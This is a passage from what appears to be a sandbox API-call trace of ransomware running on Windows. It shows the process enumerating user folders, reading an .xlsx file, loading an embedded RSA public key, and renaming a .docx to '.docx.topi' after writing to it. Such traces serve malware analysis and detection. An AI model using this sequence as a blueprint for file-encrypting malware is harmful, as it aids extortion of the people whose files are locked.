(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9318 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9300 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f17b8 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.084] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0xabee, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xabee, lpOverlapped=0x0) returned 1 [0095.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.084] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xabf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.085] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.085] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.085] CloseHandle (hObject=0x6a8) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.086] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.086] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.086] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M2mQj1jys6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m2mqj1jys6.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M2mQj1jys6.docx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m2mqj1jys6.docx.topi")) returned 1 [0095.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.087] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.088] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0095.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0095.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3a60 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3ad8 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3b50 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dab0 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3970 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3970 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.089] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.089] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.089] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x6edd00 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3bc8 [0095.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3cb8 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3e20 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d2f8 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3a60 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3ad8 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3b50 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3970 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.090] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2eabb70, ftCreationTime.dwHighDateTime=0x1d548ed, ftLastAccessTime.dwLowDateTime=0xfe8180e0, ftLastAccessTime.dwHighDateTime=0x1d5575e, ftLastWriteTime.dwLowDateTime=0xfe8180e0, ftLastWriteTime.dwHighDateTime=0x1d5575e, nFileSizeHigh=0x0, nFileSizeLow=0xb1ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nm0KmSzid6iXp.xlsx", cAlternateFileName="NM0KMS~1.XLS")) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.090] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nm0KmSzid6iXp.xlsx") returned=".xlsx" [0095.090] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nm0KmSzid6iXp.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nm0kmszid6ixp.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.090] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=45484) returned 1 [0095.090] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.093] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xb186, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.093] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.094] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.094] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xb1ac, lpOverlapped=0x0) returned 1 [0095.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.094] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.095] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.095] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.095] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.095] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.095] GetLastError () returned 0x0 [0095.095] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.096] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.096] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.096] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.096] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb1b0) returned 0x99f72d8 [0095.096] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f17b8 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1800 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.096] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.096] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.096] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9360 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9348 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.097] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.097] GetCurrentThreadId () returned 0x8c4 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f59b0 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.097] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.098] MoveFileW 